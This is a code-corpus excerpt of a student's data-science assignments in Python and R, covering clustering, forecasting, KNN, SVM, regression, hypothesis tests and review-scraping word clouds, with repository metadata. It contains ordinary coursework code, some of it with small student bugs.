It is estimated internally, during the run,\r\nmodel.fit(x_train, y_train)\r\n\r\nmodel.estimators_\r\nmodel.classes_ # levels in class variable\r\nmodel.n_classes_ #number of levels in class variable\r\nmodel.n_features_ #number of features\r\n\r\n#feature importance\r\nfea_imp = pd.DataFrame(model.feature_importances_,\r\n index = X.columns,\r\n columns = ['importance']).sort_values('importance',ascending =False)\r\n#US and Urban variables hold very little importance\r\n\r\nmodel.score(x_train,y_train)\r\nmodel.score(x_test,y_test) #0.9278\r\nmodel.score(data.iloc[:,0:10],data.iloc[:,-1]) #0.9475\r\ndata['y_pred'] = model.predict(data.iloc[:,0:10])\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = print(confusion_matrix(data.sales,data.y_pred))\r\n\r\nnp.mean(data.y_pred == data.sales) #0.9475\r\n" }, { "alpha_fraction": 0.6725468635559082, "alphanum_fraction": 0.6981807947158813, "avg_line_length": 35, "blob_id": "e7f152100566ea6168be7ca16f41f88fbc0913cc", "content_id": "72090a513c8f111c061fcbfcaef07b081ac334d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3628, "license_type": "no_license", "max_line_length": 121, "num_lines": 98, "path": "/Clustering/crimedata.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 23 08:56:57 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ncd=pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Clustering\\crime_data.csv')\r\ncd\r\n\r\ncd.info()\r\ncd.describe()\r\ncd.columns\r\n\r\n\r\ndef norm_func(i):\r\n x= (i- i.min())/(i.max() - i.min())\r\n return(x)\r\n\r\nX=norm_func(cd.iloc[:,1:])\r\n\r\n####KMeans Clustering####\r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss = [] #store wcss values for each cluster in list\r\nfor i in range(1,11): #no. 
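# Hedged addition to the elbow search below: the silhouette score gives an
# independent check on the choice of k; sketch reusing the normalized frame X
# defined just above in this clustering script.
from sklearn.metrics import silhouette_score
from sklearn.cluster import KMeans as KMCheck
for k in range(2, 7):
    labels = KMCheck(n_clusters=k, init='k-means++', random_state=42).fit_predict(X)
    print(k, round(silhouette_score(X, labels), 3))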
of clusters\r\n kmeans= KMeans(n_clusters= i, init='k-means++',random_state=42) #init to avoid random initialization trap\r\n kmeans.fit(X) #trained and run kmeans algorithm\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'ro-');plt.title('ELbow Method');plt.xlabel('Number of Clusters');plt.ylabel('wcss');plt.show()\r\n# we must choose 4 as the optimal number of clusters as the curve starts flattening from 4\r\n\r\nkmeans_f=KMeans(n_clusters=4,init='k-means++',random_state=42)\r\ny_kmeans=kmeans_f.fit_predict(X) #predicting the cluster for each row\r\ny_kmeans\r\nkmeans_f.labels_\r\n\r\ncd['clusters']= kmeans_f.labels_ #storing in the dataset\r\ncd.iloc[:,:].groupby(cd.clusters).mean()\r\n\r\ncluster1=X.loc[y_kmeans == 0]\r\ncluster2=X.loc[y_kmeans == 1]\r\ncluster3=X.loc[y_kmeans == 2]\r\ncluster4=X.loc[y_kmeans == 3]\r\n\r\nplt.scatter(cluster1['Murder'],cluster1['Assault'], c='red',label='Cluster 1')\r\nplt.scatter(cluster2['Murder'],cluster2['Assault'], c='blue',label='Cluster 2')\r\nplt.scatter(cluster3['Murder'],cluster3['Assault'], c='cyan',label='Cluster 3')\r\nplt.scatter(cluster4['Murder'],cluster4['Assault'], c='black',label='Cluster 4')\r\nplt.scatter(kmeans_f.cluster_centers_[:,0],kmeans_f.cluster_centers_[:,1],c='magenta',label='Centroids')\r\nplt.title('Clusters of crime')\r\nplt.xlabel('Murder')\r\nplt.ylabel('Assault')\r\nplt.show()\r\n\r\nsns.pairplot(cd,hue='clusters')\r\n\r\nsns.barplot(x='clusters',y='Murder',data=cd) #order=2,0,1,3\r\nsns.barplot(x='clusters',y='Assault',data=cd) #order=2,0,1,3\r\nsns.barplot(x='clusters',y='UrbanPop',data=cd) #order=2,3,0,1\r\nsns.barplot(x='clusters',y='Rape',data=cd) #order=2,0,3,1\r\n\r\n#cluster 2 is least vulnerable to the crimes and has lowest rates of crime and also has least urban population\r\n#Even if cluster 0 is having 2nd highest urban population, it has least rate of crimes after cluster2\r\n#cluster 1 having highest urban population, has highest rate of rapes and is second in terms of murder and assaults\r\n#cluster 3 is having lower Urban population, but it is having highest number of Murder and Assault crimes.\r\n\r\n\r\n####Hierarchicl clustering ####\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nhclust= AgglomerativeClustering(n_clusters=4,affinity='euclidean',linkage='ward').fit(X)\r\ny_hc= hclust.fit_predict(X)\r\ncd['clusters']=hclust.labels_\r\n\r\ncd.iloc[:,1:].groupby('clusters').mean()\r\n\r\nimport scipy.cluster.hierarchy as sch\r\nz= sch.linkage(X,method='ward',metric='euclidean')\r\nsch.dendrogram(z);plt.xlabel('state index');plt.ylabel('Euclidean distance');plt.title('Dendrogram')\r\n\r\ncluster1=X.loc[y_hc == 0]\r\ncluster2=X.loc[y_hc == 1]\r\ncluster3=X.loc[y_hc == 2]\r\ncluster4=X.loc[y_hc == 3]\r\n\r\nplt.scatter(cluster1['Murder'],cluster1['Assault'], c='red',label='Cluster 1')\r\nplt.scatter(cluster2['Murder'],cluster2['Assault'], c='magenta',label='Cluster 2')\r\nplt.scatter(cluster3['Murder'],cluster3['Assault'], c='cyan',label='Cluster 3')\r\nplt.scatter(cluster4['Murder'],cluster4['Assault'], c='blue',label='Cluster 4')\r\nplt.title('Clusters of crime')\r\nplt.xlabel('Murder')\r\nplt.ylabel('Assault')\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.5733137726783752, "alphanum_fraction": 0.6950146555900574, "avg_line_length": 34, "blob_id": "f1b8979d156bb49eb058327502832d2ca9a93301", "content_id": "69cfecf71b5b766b833a4e854e8336b389c7b5d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 682, "license_type": 
"no_license", "max_line_length": 131, "num_lines": 19, "path": "/Assignment 2/assignment 2.R", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "####SET+2####\r\n#Q1-\r\npnorm(50,45,8)\r\n\r\n#Q2 a) probability of employees older than 44\r\n1-pnorm(44,38,6) #=0.1586\r\n#probability of employee =s between age 38-44\r\npnorm(44,38,6)-pnorm(38,38,6) #=0.3413\r\n# Thus A.\tMore employees at the processing center are older than 44 than between 38 and 44= False\r\n\r\n#Q2 b) probability of employees younger than 30\r\npnorm(30,38,6)\r\n #Thus,no of emlployees = 0.091*400 =36.4\r\n # Thus,B.\tA training program for employees under the age of 30 at the center would be expected to attract about 36 employees= TRUE\r\n\r\n####SET4####\r\n#Q3_probability that in any given week, there will be an investigation is\r\na <- pnorm(55,50,40)-pnorm(45,50,40)\r\nbb <- 1-a" }, { "alpha_fraction": 0.5526389479637146, "alphanum_fraction": 0.5730242729187012, "avg_line_length": 28.042016983032227, "blob_id": "8376f13efa4943097435ac3057cf883057cfb8e4", "content_id": "f2f7d02fe1a9e74e7a54e7ba0872b5e50ca01d8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3581, "license_type": "no_license", "max_line_length": 100, "num_lines": 119, "path": "/Forecasting/cola2.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 1 16:25:42 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\ndf = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\CocaCola_Sales_Rawdata.xlsx')\r\ndf.head()\r\ndf.tail()\r\n\r\nimport seaborn as sns\r\nsns.boxplot(df['Sales'])\r\n\r\ndf.set_index(['Quarter'], inplace = True)\r\ndf.dtypes\r\ndf.head()\r\ndf.describe()\r\n\r\n# Lets us use auto_arima from p\r\nfrom pmdarima import auto_arima\r\nauto_arima_model = auto_arima(df['Sales'],start_p=0,\r\n start_q=0,max_p=5,max_q=5,\r\n m=12,start_P=0,seasonal=True,\r\n d=1,D=1,trace=True,error_action=\"ignore\",\r\n suppress_warnings= True,\r\n stepwise=False)\r\n#ARIMA(4,1,0)(1,1,0)[12] : AIC=400.949\r\nauto_arima_model.summary()\r\n\r\n# Using Sarimax from statsmodels \r\n# As we do not have automatic function in indetifying the \r\n# best p,d,q combination \r\n# iterate over multiple combinations and return the best the combination\r\n# For sarimax we require p,d,q and P,D,Q \r\nfrom products.models import Product\r\n\r\ncombinations_l = list(product(range(1,7),range(2),range(1,7)))\r\ncombinations_u = list(product(range(1,7),range(2),range(1,7)))\r\nm =12 \r\n\r\nresults_sarima = []\r\nbest_aic = float(\"inf\")\r\n\r\nfor i in combinations_l:\r\n for j in combinations_u:\r\n try:\r\n model_sarima = sm.tsa.statespace.SARIMAX(df[\"Sales\"],\r\n order = i,seasonal_order = j+(m,)).fit(disp=-1)\r\n except:\r\n continue\r\n aic = model_sarima.aic\r\n if aic < best_aic:\r\n best_model = model_sarima\r\n best_aic = aic\r\n best_l = i\r\n best_u = j\r\n results_sarima.append([i,j,model_sarima.aic])\r\n\r\ndf.plot();plt.xlabel('Quarter');plt.ylabel('sales')\r\n#upward trend with addiive seasonality and non-stationary\r\n\r\n#rolling statistics\r\nrol_mean = df.rolling(window = 4).mean()\r\nrol_sd = df.rolling(window = 4).std()\r\n\r\n#plotting the data\r\nplt.plot(df,color = 'blue', label = 'original 
data')\r\nplt.plot(rol_mean, color='red', label= 'rolling mean')\r\nplt.plot(rol_sd, color = 'black',label = 'rolling std')\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n\r\ndf_shifted = pd.concat([df, df.shift(4)],axis = 1)\r\n\r\ndf_shifted.columns = ['actual','shifted']\r\ndf_shifted = df_shifted.dropna()\r\n\r\nfrom sklearn.metrics import mean_squared_error\r\ndf_rmse = np.sqrt(mean_squared_error(df_shifted.actual,df_shifted.shifted ))\r\nprint(df_rmse) #363.783\r\n\r\nfrom statsmodels.graphics.tsaplots import plot_acf,plot_pacf\r\nplot_acf(df)\r\n# q = 4\r\nplot_pacf(df)\r\n# p = 1\r\n\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nmodel = ARIMA(df,order = (3,1,1))\r\nmodel.fit()\r\n\r\n#best possible values for p d qubing trial and erroe method\r\npv = range(0,4)\r\ndv = range(0,3)\r\nqv = range(0,3)\r\n\r\nfor p in pv:\r\n for d in dv:\r\n for q in qv:\r\n order = (p,d,q)\r\n pred = list()\r\n for i in range(len(df)):\r\n try:\r\n model = ARIMA(df, order)\r\n result = model.fit(disp = 0)\r\n pred_y = result.forecast()[0]\r\n pred.append(pred_y)\r\n error = mean_squared_error(df,pred)\r\n print('arima %s MSE = %.2f'% (order, error))\r\n except:\r\n continue\r\naa = print('arima %s MSE = %.2f'% (order, error))\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6231244206428528, "alphanum_fraction": 0.6469550132751465, "avg_line_length": 26.683544158935547, "blob_id": "51b09be05041f1bac279792045bb41b1cc2d081d", "content_id": "fa5915183919947183e14b74ed65ec5c011edf1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2266, "license_type": "no_license", "max_line_length": 90, "num_lines": 79, "path": "/KNN/zoo.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 2 20:26:39 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\Zoo.csv')\r\ndata\r\n\r\n#EDA and Preprocessing\r\ndata.describe()\r\ndata.info() #no null values\r\ndata.nunique()\r\ndata.columns\r\n\r\nfor col in data:\r\n plt.figure(figsize = (15,10))\r\n sns.barplot(data[col].value_counts().index,data[col].value_counts())\r\n plt.show()\r\n# =============================================================================\r\n# most animals don't have feathers\r\n# less number of animals are airborne\r\n# most animals do not have backbone\r\n# not animals animals are mostly categorized into 4 and 7 groups\r\n# very less number of animals are venomous\r\n# very less number of animals have fins\r\n# mostly animals are not domestic\r\n# most animals have 4 legs\r\n# =============================================================================\r\n\r\nX = data.iloc[:,1:17]\r\nY = data.iloc[:,-1]\r\n\r\n#splitting into train test\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y, test_size = 0.25, random_state = 42)\r\n\r\n####conventional method####\r\n#KNN classification\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nmodel = KNeighborsClassifier(n_neighbors = 5)\r\nmodel.fit(x_train,y_train)\r\nmodel.predict(x_test)\r\n\r\n#train accuracy\r\nmodel.score(x_train,y_train) #0.9333\r\n\r\n#test accuracy\r\nmodel.score(x_test,y_test) #0.8846\r\n\r\n#predicting esults on original dataset\r\ndata['y_pred'] = model.predict(X)\r\n#overall 
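# Hedged addition: the manual k loop below can be replaced by cross-validated
# search; sketch reusing the X and Y names defined earlier in this zoo script.
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier
grid = GridSearchCV(KNeighborsClassifier(),
                    {'n_neighbors': list(range(1, 10))}, cv=5)
grid.fit(X, Y)
print(grid.best_params_, round(grid.best_score_, 3))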
accuray\r\nmodel.score(X,Y) #0.92\r\n\r\n#getting dataframe of outcomes comparing with original types\r\noutcome = data[['animal name','type','y_pred']].sort_values('y_pred')\r\n\r\n####Using for Loop####\r\nfrom sklearn import metrics\r\nk_range = range(1,10)\r\nscores={}\r\nscores_list = []\r\nfor k in k_range:\r\n model = KNeighborsClassifier(n_neighbors = k)\r\n model.fit(x_train,y_train)\r\n y_pred = model.predict(x_test)\r\n scores[k]= metrics.accuracy_score(y_test,y_pred)\r\n scores_list.append(metrics.accuracy_score(y_test,y_pred))\r\n \r\nprint(scores_list)\r\n#highest accuracy is obtained with 2 and 3 number of clusters that is 100% and 96.15%\r\n" }, { "alpha_fraction": 0.6371570825576782, "alphanum_fraction": 0.6608479022979736, "avg_line_length": 22.676923751831055, "blob_id": "f989bb710ad2a5a22b2c0a6502402e7a0b0155b8", "content_id": "b4a47e3d430317a07b6d84e21e98673ca44cc1a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1604, "license_type": "no_license", "max_line_length": 114, "num_lines": 65, "path": "/SVM/salary_svm.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 2 10:09:02 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndf_train = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\SVM\\\\SalaryData_Train.csv')\r\ndf_test = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\SVM\\\\SalaryData_Test.csv')\r\n\r\ndf_train.describe()\r\ndf_train.info()\r\ndf_train.columns\r\n\r\ndf_cat = ['workclass', 'education','maritalstatus','occupation', 'relationship', 'race', 'sex','native', 'Salary']\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber =LabelEncoder()\r\n\r\nfor i in df_cat:\r\n df_train[i] = number.fit_transform(df_train[i])\r\n \r\nfor i in df_cat:\r\n df_test[i] = number.fit_transform(df_test[i])\r\n \r\nx_train = df_train.iloc[:,0:13]\r\ny_train = df_train.iloc[:,-1]\r\nx_test = df_test.iloc[:,0:13]\r\ny_test = df_test.iloc[:,-1]\r\n\r\n#barplot of the data\r\nimport seaborn as sns\r\nfor col in df_train:\r\n plt.figure(figsize=(10,4))\r\n sns.barplot(df_train[col].value_counts().index,df_train[col].value_counts())\r\n plt.tight_layout()\r\n \r\n##rbf kernel\r\nfrom sklearn.svm import SVC\r\nmodel = SVC(kernel = 'rbf')\r\nmodel.fit(x_train,y_train)\r\n\r\nmodel.predict(x_test)\r\nmodel.score(x_test,y_test) #0.7964\r\n\r\n##poly kernel\r\nmodel_poly = SVC(kernel = 'poly')\r\nmodel_poly.fit(x_train,y_train)\r\n\r\nmodel_poly.predict(x_test)\r\nmodel_poly.score(x_test,y_test) #0.7795\r\n\r\n##sigmoid kernel.\r\nmodel_sig = SVC(kernel = 'sigmoid')\r\nmodel_sig.fit(x_train,y_train)\r\n\r\nmodel.predict(x_test)\r\nmodel_sig.score(x_test,y_test) #0.7568\r\n\r\n#we will go for rbf kernel giving maximum accuracy\r\n" }, { "alpha_fraction": 0.6427703499794006, "alphanum_fraction": 0.6707168817520142, "avg_line_length": 23.78125, "blob_id": "4ca498af23a7651ff22b26f554a39df5d80d2860", "content_id": "7ddae85824a24a9779d38adb3dc5b1dcdfadc5f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 823, "license_type": "no_license", "max_line_length": 93, "num_lines": 32, "path": "/KNN/forestfires.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 26 19:44:50 
2021\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n# KNN Classification\r\nfrom pandas import read_csv\r\nimport numpy as np\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\nfilename = read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\forestfires.csv')\r\nnames = [\r\n 'month', 'day', 'FFMC', 'DMC', 'DC', 'ISI', 'temp', 'RH', 'wind', 'rain','Size_Categorie'\r\n]\r\n\r\ndataframe = read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\forestfires.csv', names=names)\r\narray = dataframe.values\r\nX = array[:, 4:11]\r\nY = array[:, -1]\r\n\r\nnum_folds = 10\r\nkfold = KFold(n_splits=10)\r\n\r\nmodel = KNeighborsClassifier(n_neighbors=17)\r\nresults = cross_val_score(model, X, Y, cv=kfold)\r\n\r\nprint(results.mean())" }, { "alpha_fraction": 0.6878612637519836, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 29.454545974731445, "blob_id": "a7aedd6af0f5d20c1d2ccf8d563445f7f8ef7c0a", "content_id": "6e3a314baf991b31212d9b21d9d6232865415cfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2422, "license_type": "no_license", "max_line_length": 160, "num_lines": 77, "path": "/Simple linear regression/delivery time.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 9 14:25:41 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport statsmodels.formula.api as smf\r\n\r\ndata= pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Simple linear regression\\delivery_time.csv',encoding='ISO-8859-1')\r\ndata\r\n\r\ndata.describe()\r\ndata.info()\r\n\r\ndata.head()\r\ndata.tail()\r\n\r\ndata.columns\r\n\r\nsns.pairplot(data)\r\n\r\nplt.hist(data['Delivery_Time']) #data are not normal\r\nhelp(plt.boxplot)\r\nplt.boxplot(data['Delivery_Time'],vert=True, patch_artist=True)\r\n\r\nplt.hist(data['Sorting_Time']) # data are not normal\r\nplt.boxplot(data['Sorting_Time'],0,'rs',vert=True,patch_artist=True)\r\n\r\nplt.plot(data['Delivery_Time'],data['Sorting_Time'],'co');plt.xlabel('Delivery_Time');plt.ylabel('Sorting_Time');plt.title('Scatterplot')\r\nhelp(plt.plot)\r\n\r\ndata['Delivery_Time'].corr(data['Sorting_Time']) #0.8259 moderate correlation\r\nnp.corrcoef(data['Delivery_Time'],data['Sorting_Time'])\r\n\r\n#building model\r\nmodel1= smf.ols('data.iloc[:,0]~data.iloc[:,1]',data=data).fit()\r\nmodel1.summary() #R-squared=0.682\r\n\r\n#transforming variables for accuracy\r\n#model2 = smf.ols('AT~np.log(Waist)',data=wcat).fit()\r\nmodel2 = smf.ols('Delivery_Time ~ np.log(Sorting_Time)',data=data).fit()\r\nmodel2.summary() #R squared improved to 0.711\r\n\r\n#again transforming the model\r\nmodel3= smf.ols('np.log(Delivery_Time)~np.log(Sorting_Time)',data=data).fit()\r\nmodel3.summary() # R squared 0.772 this is not a strong model since R-squared<0.8\r\n# so, we will consider this model aas the final model with highest R-squared value\r\n\r\npred_3= 
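# Hedged aside on the SVM section above: the three kernel fits collapse into
# one loop; sketch reusing x_train, y_train, x_test, y_test from that script.
from sklearn.svm import SVC
for kern in ('rbf', 'poly', 'sigmoid'):
    clf = SVC(kernel=kern).fit(x_train, y_train)
    print(kern, round(clf.score(x_test, y_test), 4))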
model3.predict(pd.DataFrame(data['Sorting_Time']))\r\npred_3.corr(data['Sorting_Time'])\r\npred_3\r\npred3=np.exp(pred_3)\r\npred3\r\npred3.corr(data['Sorting_Time'])\r\n\r\ndata['predicted']=pred3\r\ndata\r\nplt.scatter(data['Sorting_Time'],data['Delivery_Time']);plt.plot(data['Sorting_Time'],pred3,color='blue');plt.xlabel('Sorting_Time');plt.ylabel('Delivery_Time')\r\n\r\nresid=pred3-data['Delivery_Time']\r\nresid\r\n#residuals of entire dataset\r\nstudent_resid= model3.resid_pearson\r\nstudent_resid\r\nplt.plot(student_resid,'o');plt.axhline(y=0,color='green');plt.xlabel('Observed numbers');plt.ylabel('standardized residuals')\r\nplt.hist(student_resid)\r\n\r\n#predicted Vs. Actual values\r\nplt.scatter(pred3,data.Delivery_Time,color='red');plt.xlabel('predicted');plt.ylabel('actual')\r\n\r\nmodel3.conf_int(0.05)\r\n" }, { "alpha_fraction": 0.6814903616905212, "alphanum_fraction": 0.7103365659713745, "avg_line_length": 35.818180084228516, "blob_id": "5e9e0ff0bfd9be36fcd70a22e4d2fe30fe3cfe80", "content_id": "4cd311ad9d5fb2eb0f52fb340edcf57c14347e58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 832, "license_type": "no_license", "max_line_length": 86, "num_lines": 22, "path": "/Hypothesis/cof.R", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "####customer_order_form####\r\n#Defective % do not vary by centre for all countries\r\n#defective % vary by centre by centre for at least one country\r\ncust <- read.csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Hypothesis\\\\Costomer+OrderForm.csv')\r\nView(cust)\r\n\r\ncust$Phillippines2[cust$Phillippines=='Error Free']='1'\r\ncust$Indonesia2[cust$Indonesia=='Error Free']='1'\r\ncust$Malta2[cust$Malta=='Error Free']='1'\r\ncust$India2[cust$India=='Error Free']='1'\r\n\r\ncust$Phillippines2[cust$Phillippines=='Defective']='0'\r\ncust$Indonesia2[cust$Indonesia=='Defective']='0'\r\ncust$Malta2[cust$Malta=='Defective']='0'\r\ncust$India2[cust$India=='Defective']='0'\r\n\r\nstacked <- stack(cust)\r\nstacked\r\na <- table(stacked$ind,stacked$values)\r\nchisq.test(a)\r\n#p-value is 0.2721 >0.05 --> Fail to reject Ho\r\n#Thus,Defective % do not vary by centre for all countries\r\n" }, { "alpha_fraction": 0.5726091861724854, "alphanum_fraction": 0.6060606241226196, "avg_line_length": 31, "blob_id": "1a15c0a24b854cc6ade2598ffc1dbcb050f85dc1", "content_id": "02932bd86c4f0bfb8f43e7c5d990e3f3cd1daf22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2541, "license_type": "no_license", "max_line_length": 240, "num_lines": 77, "path": "/Text mining 1/reviews.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 4 16:07:22 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport re\r\n\r\nreviews = []\r\nfor i in range(1,20):\r\n ip=[]\r\n url=\"https://www.amazon.in/Sony-HT-S20R-Soundbar-Bluetooth-Connectivity/dp/B084685MT1/ref=sr_1_1?crid=1AS0CVH00ZXCK&dchild=1&keywords=sony+home+theatre+5.1+with+bluetooth+with+bass&qid=1602513091&sprefix=sony+%2Caps%2C443&sr=8-1\"+str(i)\r\n response = requests.get(url)\r\n soup=bs(response.content,\"html.parser\")\r\n reviews1=soup.findAll(\"span\",attrs={\"class\",\"a-size-base 
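# Hedged aside on the delivery-time models above: the three specifications can
# be compared in one pass; sketch reusing the `data` frame from that script.
import numpy as np
import statsmodels.formula.api as smf
specs = ['Delivery_Time ~ Sorting_Time',
         'Delivery_Time ~ np.log(Sorting_Time)',
         'np.log(Delivery_Time) ~ np.log(Sorting_Time)']
for f in specs:
    print(f, round(smf.ols(f, data=data).fit().rsquared, 3))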
review-text\"})\r\n for i in range(len(reviews1)):\r\n ip.append(reviews1[i].text) \r\n reviews=reviews+ip \r\n \r\nwith open(\"ecom_rev.txt\",\"w\",encoding='utf8') as output:\r\n for i in reviews:\r\n output.write(i+\"\\n\\n\")\r\nrev_string = \" \".join(reviews)\r\nrev_string = re.sub(\"[^A-Za-z\" \"]+\",\" \",rev_string).lower()\r\nrev_string = re.sub(\"[0-9\" \"]+\",\" \",rev_string)\r\nreviews_words = rev_string.split(\" \")\r\n\r\n#getting word cloud for reviews\r\nstop_words = stopwords.words('english')\r\nwith open(\"stop.txt\",\"r\") as sw:\r\n stopwords = sw.read()\r\nstopwords = stopwords.split(\"\\n\")\r\nstp_wrds_final = stopwords+stop_words\r\nreviews_words = [w for w in reviews_words if not w in stp_wrds_final]\r\nrev_string = \" \".join(reviews_words)#for word cloud\r\nwordcloud_rev = WordCloud(\r\n background_color='white',\r\n width=1800,\r\n height=1400\r\n ).generate(rev_string)\r\n\r\nplt.imshow(wordcloud_rev)\r\n\r\n#positive words wordcloud\r\nwith open(\"positive-words.txt\",\"r\") as pos:\r\n poswords = pos.read().split(\"\\n\")\r\nposwords = poswords[36:]\r\npos_rev = \" \".join ([w for w in reviews_words if w in poswords])\r\nwordcloud_pos = WordCloud(\r\n background_color='black',\r\n width=1800,\r\n height=1400\r\n ).generate(pos_rev)\r\n\r\nplt.imshow(wordcloud_pos)\r\n\r\n#negative words wordcloud\r\nwith open(\"negative-words.txt\",\"r\") as neg:\r\n negwords = neg.read().split(\"\\n\")\r\nnegwords = negwords[37:]\r\nneg_rev = \" \".join ([w for w in reviews_words if w in negwords])\r\n\r\nwordcloud_neg = WordCloud(\r\n background_color='black',\r\n width=1800,\r\n height=1400\r\n ).generate(neg_rev)\r\n\r\nplt.imshow(wordcloud_neg)\r\n" }, { "alpha_fraction": 0.6652719378471375, "alphanum_fraction": 0.6852958798408508, "avg_line_length": 33.978492736816406, "blob_id": "560588fbd5281acce187b37f5ad4ef77a8afa1e3", "content_id": "33a29165b949ae1dd1741eb89ade3982f52618fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3346, "license_type": "no_license", "max_line_length": 101, "num_lines": 93, "path": "/Random forest/Fraud_check_RF.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 30 18:03:05 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Random forest\\\\Fraud_check.csv')\r\ndata.describe()\r\ndata.info()\r\ndf = data['Taxable.Income']\r\ndata['status'] = np.where(df<=30000,'Risky','Good')\r\ndata.columns\r\ndata_cat=['Undergrad', 'Marital.Status','Urban', 'status']\r\n\r\n#Encoding Categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnum = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = num.fit_transform(data[i])\r\n \r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x='Undergrad',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Marital.Status',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Urban',data=data).plot(kind = 'bar')\r\nsns.countplot(x='status',data=data).plot(kind = 'bar') #largely imbalanced\r\n\r\nsns.boxplot(x= 'Marital.Status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'Work.Experience',data = data)\r\n\r\npd.crosstab(data['Marital.Status'],data.status).plot(kind = 'bar')\r\n#dropping the Taxable.Income Column as we've converted it into the categorical variable\r\ndata = 
